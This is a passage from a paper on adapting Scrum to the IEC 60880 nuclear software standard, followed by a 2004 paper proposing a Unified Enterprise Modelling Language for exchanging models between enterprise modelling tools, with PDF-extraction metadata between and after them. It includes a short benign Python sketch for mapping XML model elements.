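        FunctionalRequirement("F-7", "Log operator commands", 16, related_safety_ids=["S-1"])
    )
    for req in backlogs.affected_safety_requirements("F-7"):
        print(req.req_id, req.text)
```

The same cross-references can of course be kept in a spreadsheet or a requirements management tool; the point is only that each functional item explicitly records which safety items it touches.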
7.2 **Scrum adaptations**

- **5.4.9** – Annex F in IEC 60880 lists a recommended set of documents to be generated at the end of each phase. Since each sprint is a miniature V-model, each sprint will contain activities from several phases. The relevant points in the annex F table are 8.2.2 and 8.2.3 – both related to verification. Each phase will need a set of documents generated at its end to prove that the activities were done according to the standard. It is up to the assessor what he will accept as proof of conformance; this therefore needs to be discussed and agreed upon at the start of the project. Note that these documents will have to be (partly) rewritten when one or more requirements change. The three documents needed at the end of each sprint are:
  - Software test specification document. Given the dynamic nature of requirements handling in Scrum, this report has to be written when handling each requirement, based on the tests designed for that requirement.
  - Software code verification report – written at the end of each sprint.
  - Software test report – written at the end of each sprint.
- **5.4.10** – "Each phase shall be systematically terminated by a review...". Based on the way a project phase is described in section 5.4, we will consider the end of a sprint as the end of a set of phases. Scrum already has a review at the end of each sprint, but this may need to be extended in order to meet the assessor's requirements.
- **6.1.4** – "…the process of laying down software requirements shall be rigorous". It is up to the assessor to decide what he will accept as rigorous. As a minimum, the organization needs to propose a definition, which should be company-wide rather than project-specific. It is common in Scrum to elaborate the requirements when they are taken out of the sprint backlog. This will, however, not be sufficient in our case, and we must adapt Scrum as follows: all requirements must be rigorously defined when they are
  - Inserted into the backlog
  - Taken out of the sprint backlog
  - Revised and reinserted into the backlog
- **6.1.5** – Annex A is related to the software safety life cycle. This annex describes how to handle requirements. Part of this – e.g. A.2.1: Description of constraints between hardware and software – is handled outside Safe Scrum, while other parts – e.g. A.2.2: Self-supervision – are taken care of by requirements in the safety product backlog.
- **7.1.2.5** – Annex B is related to requirements handling. The first part handles the design process, which is outside Scrum – often called Scrum iteration 0. Part 2 handles the software structure, which should be part of the coding standard and will not affect the choice of development process. The same holds for part 3 – Self-supervision – and part 5 – Language dependent recommendations. Part 4 is about subroutines and goes a long way towards recommending test-driven development, albeit without actually using this term. The important challenge is found in B4gc, which requires that "A formal description of the test inputs and results (test protocol) should be produced." This is an extension of the common way of doing testing in Scrum, and we thus need to insert it into the develop-and-test part of the development process.
- **8.2.3** – Table E.4.2: Testing methods. This table describes types of tests that should be performed – e.g. path testing, data movement testing and timing testing – and should thus be included in a test procedure description.

8. Threats to validity

When discussing the relevance of our conclusions, four things are important: have we understood certification, have we understood the standard, have we touched all relevant parts, and have we understood agile development in general and Scrum in particular? We will briefly discuss each of these questions below.

- Have we understood the right way to do certification?
One of the authors has been working with safety certification of safety-critical systems for a long time. His experience and insight give us confidence that our discussions and conclusions are sound.

- Have we understood IEC 60880?

One of the authors has been working in the nuclear industry for a long time and knows the relevant standards and how they are used in nuclear-related software development. Thus, this part is OK.

- Have we touched all relevant items?

We have scrutinized the standard and identified all parts where the term "software" is used. The requirements handled in sections 6.2 and 7.2 thus cover all relevant items.

- Have we understood agile development – especially Scrum?

We have already done extensive research on the application of Scrum under two other standards – ISO 9001 and IEC 61508. IEC 60880 contains no problems that have not already been discussed in relation to these two standards.

Our claim to validity is based on the preceding bullet points. Based on the discussion above, we are confident that the adaptation described in section 7 will make it possible to use Scrum as a development process and still be IEC 60880 compliant.

9. Conclusions and Further work

First and foremost: while there are problems with the application of Scrum-as-is together with IEC 60880 – e.g. traceability – these and all other problems identified in section 6 above are taken care of when using our Safe Scrum. In addition, the assessor needs to be involved from day one of the development. We have already identified several sections in relevant parts of the standard where the standard itself leaves the requirements open to interpretation. It is the development organization's duty to make a relevant interpretation of each requirement in the standard, but it will ease the final certification process tremendously if these interpretations are accepted by the assessor before development starts.

As should be expected, the majority of the Scrum problems handled by Safe Scrum are related to the handling of software requirements and to testing – test specifications, the test methods used and the final test report for each requirement.

The next step in this work is to identify a small but real project in the nuclear industry where we can try Safe Scrum in a real environment. As always, the proof of the pudding is in the eating.

10. References
{"Source-Url": "https://www.sintef.no/globalassets/scrum-and-iec-60880_march-2013.pdf", "len_cl100k_base": 5033, "olmocr-version": "0.1.50", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 20243, "total-output-tokens": 5932, "length": "2e12", "weborganizer": {"__label__adult": 0.0003235340118408203, "__label__art_design": 0.00025653839111328125, "__label__crime_law": 0.0004119873046875, "__label__education_jobs": 0.0015745162963867188, "__label__entertainment": 3.826618194580078e-05, "__label__fashion_beauty": 0.00015079975128173828, "__label__finance_business": 0.0005965232849121094, "__label__food_dining": 0.0003223419189453125, "__label__games": 0.0004732608795166016, "__label__hardware": 0.0010128021240234375, "__label__health": 0.0005173683166503906, "__label__history": 0.0001838207244873047, "__label__home_hobbies": 9.953975677490234e-05, "__label__industrial": 0.0012979507446289062, "__label__literature": 0.00016021728515625, "__label__politics": 0.00020742416381835935, "__label__religion": 0.00038051605224609375, "__label__science_tech": 0.01381683349609375, "__label__social_life": 6.198883056640625e-05, "__label__software": 0.00469207763671875, "__label__software_dev": 0.97216796875, "__label__sports_fitness": 0.0003998279571533203, "__label__transportation": 0.0006504058837890625, "__label__travel": 0.00019073486328125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 24728, 0.02897]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 24728, 0.29942]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 24728, 0.93753]], "google_gemma-3-12b-it_contains_pii": [[0, 2504, false], [2504, 5221, null], [5221, 7409, null], [7409, 10481, null], [10481, 12441, null], [12441, 15060, null], [15060, 17229, null], [17229, 20734, null], [20734, 23791, null], [23791, 24728, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2504, true], [2504, 5221, null], [5221, 7409, null], [7409, 10481, null], [10481, 12441, null], [12441, 15060, null], [15060, 17229, null], [17229, 20734, null], [20734, 23791, null], [23791, 24728, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 24728, null]], "pdf_page_numbers": [[0, 2504, 1], [2504, 5221, 2], [5221, 7409, 3], [7409, 10481, 4], [10481, 12441, 5], [12441, 15060, 6], [15060, 17229, 7], [17229, 20734, 8], [20734, 23791, 9], [23791, 24728, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 24728, 0.0]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
6be32ce64ca061d6adb8cf2b6f08b5acfd777a17
A Unified Enterprise Modelling Language for enhanced interoperability of Enterprise Models

Hervé Panetto, Giuseppe Berio, Khalid Benali, Nacer Boudjlida, Michaël Petit

To cite this version: Hervé Panetto, Giuseppe Berio, Khalid Benali, Nacer Boudjlida, Michaël Petit. A Unified Enterprise Modelling Language for enhanced interoperability of Enterprise Models. 11th IFAC INCOM2004 Symposium, Apr 2004, Bahia, Brazil. pp.1-12. hal-00120943

HAL Id: hal-00120943, https://hal.science/hal-00120943, submitted on 19 Dec 2006. HAL is a multi-disciplinary open access archive for the deposit and dissemination of scientific research documents, whether they are published or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers.

A UNIFIED ENTERPRISE MODELLING LANGUAGE FOR ENHANCED INTEROPERABILITY OF ENTERPRISE MODELS

Hervé Panetto¹, Giuseppe Berio², Khalid Benali³, Nacer Boudjlida³, Michaël Petit⁴

¹CRAN UMR 7039, University Henri Poincaré Nancy I, F-54506 Vandoeuvre-les-Nancy Cedex, Herve.Panetto@cran.uhp-nancy.fr
²Dipartimento di Informatica, Università di Torino, Torino, Italy, berio@di.unito.it
³LORIA UMR 7503, F-54506 Vandoeuvre-les-Nancy Cedex
⁴Institut d'Informatique, Facultés Universitaires Notre-Dame de la Paix, Namur, Belgium, mpe@info.fundp.ac.be

Abstract: Awareness, acceptance and wide use of Enterprise Modelling (EM) technology lag seriously in industry because enterprises cannot capitalise on previous modelling efforts. This situation hinders true enterprise integration, interoperability, and enterprise knowledge sharing. A Unified Enterprise Modelling Language, based on meta-modelling of existing EM languages, would serve as an Interlingua between EM tools, providing the business community with a common visual, template-based language to be used on top of most commercial enterprise modelling and workflow software tools.

Keywords: enterprise modelling, meta-modelling, interoperability, enterprise system

1. INTRODUCTION

Today's "business trends are clearly towards the need for managing organizational and operational changes within companies in order to face global competition and fluctuating market conditions" (Vernadat, 1996). This situation poses a number of integration (and interoperability) problems that enterprises have to tackle: integration of markets, integration between several development and manufacturing sites, integration between suppliers and manufacturers, integration of design and manufacturing, and integration of multi-vendor hardware and software components. Enterprise Integration is therefore no longer only a problem of interconnecting physical and software applications; it also requires global business integration, aiming at using existing or new enterprise resources to better achieve the overall business objectives. "Things to be integrated and coordinated need to be modelled. Thus, Enterprise Modelling (EM) is clearly a prerequisite for enterprise integration". According to Vernadat (1996), enterprise modelling is the set of activities or processes used to develop the various parts of an enterprise model to address some desired modelling finality.
It can also be defined as the art of “externalising” enterprise knowledge, i.e. representing the enterprise in terms of its organisation and operations (e.g. processes, behaviour, activities, information, object and material flows, resources and organisation units, and system infrastructure and architectures). The finality is to make explicit facts and knowledge that add value to the enterprises or can be shared by business applications and users. The prime goal of enterprise modelling is not only to be applied for better enterprise(s) integration but also to support analysis of an enterprise, and more specifically, to represent and understand how the enterprise works, to capitalize acquired knowledge and know-how for later reuse, to design (or redesign) a part of the enterprise, to analyse some aspects of the enterprise (by e.g. economic analysis, organization analysis, qualitative or quantitative analysis,...), to simulate the behaviour of (some part of) the enterprise, to make better decisions about enterprise operations and organization, or to control, coordinate and monitor some parts of the enterprise. Within the initiative on Computer Integrated Manufacturing (CIM), Enterprise Modelling was born in the United States at the beginning of the 80's and emerged through large CIM projects (e.g. ICAM or CAM-I). In the mid-80's, Europe launched several projects on Enterprise Modelling giving birth to several enterprise modelling languages (including notably GRAI (Doumeingts, et al., 1998) and CIMOSA (AMICE, 1997; Kosanke, et al., 1999)). As a result, in the 90's many commercial tools dealing with EM or business process modelling appeared on the marketplace, e.g. ARIS ToolSet, FirstSTEP, METIS, Enterprise Modeller, KBSI, CimTool, MO²GO, e-MAGIM and many others. Because most resources in modern enterprise were computerised systems, the problem of enterprise integration was also been approached with workflow systems, each one with its own modelling environment (Action Workflow, COSA, FlowMark, Lotus Notes, Teamware Flow, Ensemble, WorkParty, ...) and, in the late 90’s, with EAI (Enterprise Applications Integration) tools. In computerised systems, the situation is currently worse than before. This is mainly due to the “Internet based systems” which, while offering very powerful, low cost and open infrastructures, fall short of integration. In fact, the many related standards (e.g., XML and its customisations) do not directly address the “problem of meaning”. This intensive production of tools has led to a Tower of Babel situation in which the many tools, while offering powerful and distinct functionalities, are unable to interoperate and can hardly or not at all communicate and exchange models. This is a serious drawback for awareness, acceptance and wide use of the EM technology since enterprises cannot capitalise from previous modelling efforts. This situation hinders true enterprise integration, interoperability, and sharing enterprise knowledge. 2. ENTERPRISE INTEGRATION AND ENTERPRISE MODELLING Enterprise Modelling is an engineering discipline closely related to computerised systems. As such, it requires the combined use of Enterprise Modelling Software Environments (EMSE), Enterprise Modelling Languages (EML), and Enterprise Engineering Methodologies (EEM). According to this point of view, there exists a lot of fragmented approaches to enterprise modelling (including Methodologies, Languages and Tools). 
They cover different subsets of the different components of the enterprise engineering world. For instance, the ENV12204 (CEN, 1995) standard of CEN provides an Enterprise Modelling Language, but does not address any of the other components (no tool, methodology or meta-modelling capacity)); GERAM (GERAM, 1997) and ISO/IEC 15288 define methodological guidelines for Enterprise Engineering but without any modelling language; the Workflow Management Coalition (WfMC) provides a modelling language (WPDL) but without methodological support for using this language for modelling processes; the same happens with other EAI tools (such as the so called Integration Brokers). They also cover different parts of the enterprise life-cycle. For instance, ebXML and WfMC focus on software design while approaches like CIMOSA mainly concentrate on enterprise requirements and design. Additionally, some approaches link enterprise models to Enterprise Operation Tools (EOT). These links allow the produced models to be used, for instance, for process enactment and control (e.g. in the WfMC approach, WPDL models are used by a workflow engine to control the execution of ongoing work). Models may be also linked to enterprise software applications like ERP (Enterprise Resource Planning) systems (e.g. ARIS and mySAP.com). Some other approaches only aim at modelling for understanding and analysing and they do not provide explicit links to operational systems or to other models in the life-cycle (e.g. ENV12204). Enterprise modelling approaches may also have very different objectives and needs. As a meaningful example, we may compare the aims of IEM and GRAI. IEM allows representing business processes and it provides specific concepts adapted for assessing quality management procedures, but it cannot directly be employed for an operational implementation of the business processes. In fact, for quality management, it is not necessary to fully define an implemented process. The description has only to be sufficient to enable determining whether the process steps conform to defined quality procedures. This later objective requires, for example, representing outcomes of each process step and their usage as inputs for other process steps. On the other hand, the main objective of GRAI modelling is to define the control system of an enterprise. This requires a very good understanding of the relationships between the business processes at the various control levels (operational, tactical, and strategic). Quality procedures do not guarantee that an enterprise has good performance but only that its products conform to some quality criteria, whereas enterprise control tries guarantee that an enterprise... In enterprise modelling, there seems to be a tendency for approaches combining, in a more or less integrated way, several sub-languages or views (see e.g. CIMOSA, GRAI, and ARIS). A combining approach allows taking advantage of the strengths of each of the sub-languages and offers the advantage that the resulting combined method or methodology offers the modeller the capacity to meet more modelling objectives. Models built with the distinct languages have to be related in some way and the languages have to be integrated. This need for integrating distinct modelling languages and relating models has also been recognised in domains like software formal methods for achieving effective and “practical” solutions to complex problems. 
However, the integration of several sub-languages (often called views) is currently always performed within a single tool (i.e. in a single approach which creates many overlapping with other existing approaches). No tool (at least in the enterprise modelling domain) currently supports the combination of its own models with models created with a language supported by another tool. A completely integrated language allowing the creation of models combining all needed aspects of the reality is probably unachievable and the supporting tools for that language would be too complex to build. Therefore, the only reasonable approach seems to be to create a modelling environment from “legacy” enterprise modelling tools (and languages) allowing to reuse existing models and to leverage these existing models and tools into an integrated environment. This integrated environment should also be complemented with a process for extending, in a controlled way, a set of limited constructs belonging to a core language. As we will see in the remainder (section 3.3), a sample of this process has been defined during the UEML project. 3. THE UEML The UEML project was set up in an attempt to contribute to the solving of the problems of multiple EMLs. The long term objective of UEML is the definition of a core language called Unified Enterprise Modelling Language, which would serve as an Interlingua between EM tools. This language will: - Provide the business community with a common visual, template based language to be used on top of most commercial enterprise modelling and workflow software tools; - Provide standardised mechanisms for sharing and exchanging enterprise models among projects, overcoming tool dependencies; - Support the implementation of open and evolutionary enterprise model repositories to leverage enterprise knowledge engineering services and capabilities. In order to prepare this long term objective, the UEML project was initiated with the objective to create and manage a working group aiming to: - Create a European Consensus on a core set of modelling constructs and facilitating interoperability in the frame of on-going standardisation efforts in this domain. - Build a demonstrator portal with services and contents to support and promote, testing, industrial validation, and to collect comments. The first objective of the project was to analyse the market potential of a UEML, to accurately define the specifications of an embryo of such a language and to demonstrate and disseminate the concepts. 3.1 The need for UEML Two main efforts related to the definition of a common core language for enterprise modelling are PSL (PSL, 2002) and ENV12204 that however do not currently provide a satisfactory answer to critical and also practical problems. PSL is a logic-based approach that does not clearly address the problem of the basic mapping between a generic EML and PSL itself. This mapping should e.g. state, for instance, that the concept of Activity belonging to an EML corresponds to the concept of Activity in PSL. Being a declarative language, PSL allows discovering inconsistencies between distinct models provided in distinct EMLs. However, it neither prevents nor solves these inconsistencies. ENV12204 is merely a set of useful concepts for understanding the domain of enterprise modelling (or even the set of things that need to be represented by any enterprise modelling language). However, its syntax is not well defined and therefore it cannot be used as an exchange format between distinct tools. 
It also does not define mappings between existing EMLs and itself. The usefulness of a UEML would therefore reside in the availability of a well-defined syntax and of well-defined mappings (possibly standardised) between various EMLs and UEML. We believe that the definition of mappings between languages and UEML is important but quite independent from the UEML definition itself. Though these mappings should be precisely defined and shared (through, for instance, standardisation), they are based on reasonable hypotheses and will never be fully (and formally) provable.

² A new version of ENV 12204, EN ISO 19440, is expected in early 2004.

Other approaches which attempt to solve the problems of exchange and interoperability between computerised systems do not deal clearly with the enterprise modelling area. They can be classified as ways of enabling business-level communication between distinct computer-based systems and therefore as bottom-up approaches. For instance, ebXML, WPDL and EAI techniques are useful for defining communication at the business level among enterprise software. These approaches are really useful for programming software layers such as middleware (e.g. CORBA) and customising software architectures. This description of purely software aspects can be considered as a kind of high-level programming that in any case requires enterprise modelling as a prerequisite. However, another prerequisite for the exchange of models (or for making models interoperable) through a common language to be meaningful is to clearly understand the semantic links existing between the models themselves. This understanding is fundamental because, without it, an exchanged model could be understood in a totally different way by the receiving tool, and thus misinterpreted.

3.2 The need for meta-modelling

In order to understand the links between distinct languages, meta-modelling is an important issue. Meta-modelling allows defining the syntax of a language\(^3\). The product of meta-modelling is usually called a meta-model. Meta-models need to be described by using meta-modelling techniques (i.e. languages for making meta-models). Approaches like XML (DTDs and Schemas), MOF and Telos can be used. These techniques are content-independent (applicable for the definition of any language). Other meta-modelling techniques are content-dependent (and sometimes domain-specific): for instance, XMI is an exchange format, based on the meta-model of UML (UML, 2003) in XML, designed for enabling the exchange of UML models. Accordingly, a UEML could be defined as a content-dependent, domain-specific meta-model through a content-independent meta-model. The UEML might just use content-independent meta-modelling techniques\(^4\) as a way for its definition. Currently, several meta-modelling languages (and also tools) exist, but none of them is specifically targeted at the definition of EMLs. The reason is that these meta-modelling languages were often developed to design and implement information systems, knowledge base systems and computer-based infrastructures (environments) allowing meta-models to be programmed.

3.3 The UEML approach

In the UEML project, a UEML meta-model was built on the basis of three existing languages (namely IEM, EEML and GRAI). An illustrative scenario was defined in which models of a common situation are stored in distinct software tools and exchanged. First, models of this scenario were elaborated in the three distinct languages and the exchange was performed manually by specialists of these languages.
More precisely, given a first model in IEM, specialists of GRAI and EEML provided the "semantically equivalent" model in their own languages. Afterwards, the IEM, EEML and GRAI constructs were meta-modelled using UML class diagrams. This resulted in three so-called "original meta-models". At the same time, the links between the concepts of every original meta-model and their use in the models of the Scenario were defined to illustrate how a unique real-world phenomenon is modelled with the three original meta-models.

With the aim of defining a common meta-model for core constructs, we compared and "unified" the three meta-models through an incremental approach. We compared the three meta-models peer-to-peer to find any correspondence between a concept in one meta-model and a concept in another one. Once the peer-to-peer correspondences (and absences of correspondences) had been defined, a set of common concepts was identified (Table 1) and further elaborated into the first version of the UEML meta-model 1.0 (Fig. 1). This meta-model represents the common concepts underlying the three original EMLs. Since this meta-model is markedly different from the three original ones, through the use of an appropriately higher level of abstraction, and considering some discrepancies among the three original meta-models, we informally re-defined new correspondences between the UEML meta-model and each original meta-model. Finally, the UEML meta-model and the new correspondences were validated against a subset of the Scenario.

3.4 Defining mappings among EMLs

The clear definition of the meta-models of existing EMLs and of UEML with meta-modelling techniques is necessary but not sufficient to achieve a meaningful exchange of models. The correspondences among constructs of two distinct languages have to be precisely defined by comparing the semantics of these constructs. However, this is a difficult task because:

- EMLs are often based on informal semantics, i.e. natural-language descriptions of the constructs' meaning.
- The way in which EMLs are used in specific contexts and situations may change.

Therefore, as suggested in Sect. 3.1, mappings between languages should rely on reasonable hypotheses, which should be clearly stated and become the basis for building the language, and possibly be standardised further.

\(^3\) A meta-model may also be used to define part or all of the semantics of the language, but this is often not recommended.
\(^4\) It should be noted that the notion of meta-modelling technique is relative. In fact, it is often true that a language can be used as a meta-modelling technique for another (sometimes the same) language.
Fig. 1: The UEML 1.0 meta-model

Table 1: Extract of the common concepts of UEML

<table> <thead> <tr> <th>COMMON CONCEPT</th> <th>GRAI</th> <th>IEM</th> <th>EEML</th> </tr> </thead> <tbody> <tr> <td>ACTIVITY</td> <td></td> <td>Extended activity</td> <td>Action state</td> </tr> <tr> <td>ROLE</td> <td></td> <td>Not explicit</td> <td>IEM Object state</td> </tr> <tr> <td>RESOURCE</td> <td></td> <td>Resource</td> <td>Resource class</td> </tr> <tr> <td>INPUT/OUTPUT FLOW</td> <td></td> <td>Input/Flow</td> <td>Successor/ProcessElement</td> </tr> <tr> <td>CONSTRAINT FLOW</td> <td></td> <td>Control/Flow (trigger=false)</td> <td>No direct</td> </tr> <tr> <td>CONTROL FLOW</td> <td></td> <td>Control/Flow (trigger=true)</td> <td>ControlSuccessor/ProcessElement</td> </tr> <tr> <td>RESOURCE FLOW</td> <td></td> <td>Resource/Flow (trigger=false)</td> <td>ResourceSuccessor/ResourceState</td> </tr> <tr> <td>CONNECTION OPERATOR</td> <td></td> <td>Logical operator</td> <td>Connection Element State</td> </tr> <tr> <td>PORT</td> <td></td> <td>Connector</td> <td>Port</td> </tr> </tbody> </table>

Mappings can be defined, more or less precisely, in various languages. For example, they can be expressed informally in natural language or through the use of a meta-modelling language. From a technical viewpoint, XSLT is a proposal for defining transformations of XML documents based on a set of transformation rules expressed on the basis of XML schemas. The advantage of this approach is that software tools are already operational to interpret these mappings and apply them to XML documents. This approach could be considered as a means of implementing correspondences among EMLs, provided that these have an XML syntax. Defining relationships at the language level can also be done in an "a priori" manner when new methodologies and methods are under definition. Therefore, a UEML can be a good starting base for placing under control the process of defining new methods and methodologies, as well as the rules applied in a specific methodology. A small illustrative sketch of how such a construct-level mapping could be applied to XML-serialised models is given below.
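Neither UEML nor the original EMLs define the XML vocabulary used here, and the natural technology for such mappings would be XSLT as mentioned above; purely as an illustration of the kind of construct-level correspondence listed in Table 1, the following Python sketch rewrites a hypothetical XML-serialised source model into UEML-tagged XML. The tag names, the mapping table and the example model are assumptions made for the example.

```python
# Illustrative sketch only: applying a construct-level mapping to an XML-serialised
# model. Tag names and the mapping table are hypothetical; they merely mimic the
# kind of correspondences listed in Table 1.
import xml.etree.ElementTree as ET

# Hypothetical correspondence table: source-language construct -> UEML construct.
CONSTRUCT_MAP = {
    "ExtendedActivity": "Activity",   # IEM-style construct -> UEML Activity
    "ResourceClass": "Resource",
    "ControlFlow": "ControlFlow",
}


def to_ueml(source_root: ET.Element) -> ET.Element:
    """Rewrite a source model tree into a UEML-tagged tree, skipping unmapped constructs."""
    target_root = ET.Element("UEMLModel")
    for element in source_root:
        ueml_tag = CONSTRUCT_MAP.get(element.tag)
        if ueml_tag is None:
            continue  # construct has no UEML counterpart; would need manual treatment
        target = ET.SubElement(target_root, ueml_tag, attrib=dict(element.attrib))
        target.text = element.text
    return target_root


if __name__ == "__main__":
    source_xml = """
    <IEMModel>
      <ExtendedActivity name="Check order"/>
      <ResourceClass name="Clerk"/>
      <Decoration name="ignored"/>
    </IEMModel>
    """
    ueml = to_ueml(ET.fromstring(source_xml))
    print(ET.tostring(ueml, encoding="unicode"))
```

A real mapping would of course also have to handle relationships between constructs and the semantic assumptions discussed in Sect. 3.4, not just element renaming.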
4. CONCLUSION AND OUTLOOK

4.1 Future perspective for enterprise modelling

This analysis of the state of the art in enterprise modelling (Petit, et al., 2002) demonstrates the need to define and develop a UEML approach to solve the current problems faced by workers in the enterprise modelling domain. But such a UEML approach can only be successful and effective under two conditions:

- Providing a global approach to interoperability among enterprise modelling software, going further than only providing a common exchange format;
- Making clear and effective the link between enterprise modelling and Enterprise Applications and Software.

4.2 UEML as a global approach to enterprise modelling

As stated earlier, a common exchange format, if it is to be successful, cannot be described independently of mappings to and from existing EMLs. Furthermore, this requires the explicit definition of meta-models of the involved languages and of the mappings among their concepts. However, in order to avoid UEML, as a common format, becoming yet another language among the large set of existing ones, a larger view of interoperability among EM tools is required. The UEML language and approach must be flexible enough to cope with future proprietary emerging languages and with the evolution of existing EMLs.

The long-term objectives of a UEML approach would then be to provide the necessary concepts and tools to achieve the following:

- Interoperability between already existing supporting tools as well as newly developed tools;
- A well-founded integration basis between distinct enterprise modelling languages;
- Consistent global models on which distinct methodologies can also be integrated;
- Improvement of existing methodologies and definition of new methodologies.

These objectives pose a number of requirements on the UEML approach:

- The availability of meta-modelling concepts, methods and tools to properly define EMLs (existing ones, new emerging ones, UEML, and their extensions and particularisations for specific purposes or applications);
- The availability of concepts, methods and tools to properly define relationships among distinct EMLs and a UEML, together with relationships between models created with different EMLs and UEML;
- The concepts and tools to properly define methodologies associated with EMLs, including UEML;
- The specification of an open architecture in which all these elements can be implemented to provide an evolutionary multi-language platform for enterprise modelling centred on UEML. This platform would allow creating coherent, global and logically centralised (integrated) models of the enterprise, which may nevertheless be distributed over different enterprise modelling applications at the physical level.

4.3 From enterprise modelling to enterprise systems

We consider that Enterprise Engineering or Enterprise Modelling makes sense provided that we are able to link the tools developed in this field with the Enterprise Applications and Software. Enterprise Modelling must be considered as the way to design the architecture and the model of the enterprise independently from existing or future Enterprise Applications and Software. We see the various levels as shown in Fig. 2.

![Fig. 2: Enterprise Modelling and Enterprise Application Levels](image)

In our opinion, within ten years it will be possible to generate, from the enterprise modelling level, the specifications allowing Enterprise Applications and Software (EAS) to be chosen or customized, or to derive specifications of software applications from the enterprise models. Moreover, we believe that EAS such as ERP, SCM or CRM will no longer have a centralised structure. Rather, they will have a modular and distributed structure. Each module will be chosen and customized according to specifications generated from the enterprise models. Such a structure might decrease the time and cost of EAS development and increase the adequacy of EAS to the needs of the enterprise. This should result in an increased acceptance of EAS by end-users, higher adaptability of EAS to the enterprise structure and improved Return on Investment of EAS development.

REFERENCES

architecture - evolution and application in enterprise engineering and integration. *Computers in Industry, special issue, 40(2-3).*
UML (2003). *UML 1.5 specification*, OMG.

ACKNOWLEDGEMENT

The authors would like to thank all the UEML core members for their scientific contribution to this work. This work was funded by the European Commission IST 5th framework programme.
{"Source-Url": "https://hal.science/hal-00120943/file/incom2004_123_panetto_and_al.pdf", "len_cl100k_base": 5490, "olmocr-version": "0.1.50", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 21986, "total-output-tokens": 6350, "length": "2e12", "weborganizer": {"__label__adult": 0.0003638267517089844, "__label__art_design": 0.0012197494506835938, "__label__crime_law": 0.0005216598510742188, "__label__education_jobs": 0.0026454925537109375, "__label__entertainment": 0.0001246929168701172, "__label__fashion_beauty": 0.0002570152282714844, "__label__finance_business": 0.0054473876953125, "__label__food_dining": 0.00044918060302734375, "__label__games": 0.0005598068237304688, "__label__hardware": 0.000965118408203125, "__label__health": 0.0005755424499511719, "__label__history": 0.0005178451538085938, "__label__home_hobbies": 0.00016498565673828125, "__label__industrial": 0.0023193359375, "__label__literature": 0.0005521774291992188, "__label__politics": 0.000446319580078125, "__label__religion": 0.0005335807800292969, "__label__science_tech": 0.1861572265625, "__label__social_life": 0.00016891956329345703, "__label__software": 0.05291748046875, "__label__software_dev": 0.74169921875, "__label__sports_fitness": 0.0002646446228027344, "__label__transportation": 0.0008387565612792969, "__label__travel": 0.00023627281188964844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 28406, 0.03091]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 28406, 0.35838]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 28406, 0.89897]], "google_gemma-3-12b-it_contains_pii": [[0, 1063, false], [1063, 4337, null], [4337, 9744, null], [9744, 14721, null], [14721, 19706, null], [19706, 23062, null], [23062, 27445, null], [27445, 28406, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1063, true], [1063, 4337, null], [4337, 9744, null], [9744, 14721, null], [14721, 19706, null], [19706, 23062, null], [23062, 27445, null], [27445, 28406, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 28406, null]], "pdf_page_numbers": [[0, 1063, 1], [1063, 4337, 2], [4337, 9744, 3], [9744, 14721, 4], [14721, 19706, 5], [19706, 23062, 6], [23062, 27445, 7], [27445, 28406, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 28406, 0.09244]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
5e16eb3a2a5721629ecc74d500f02f03ed539f69
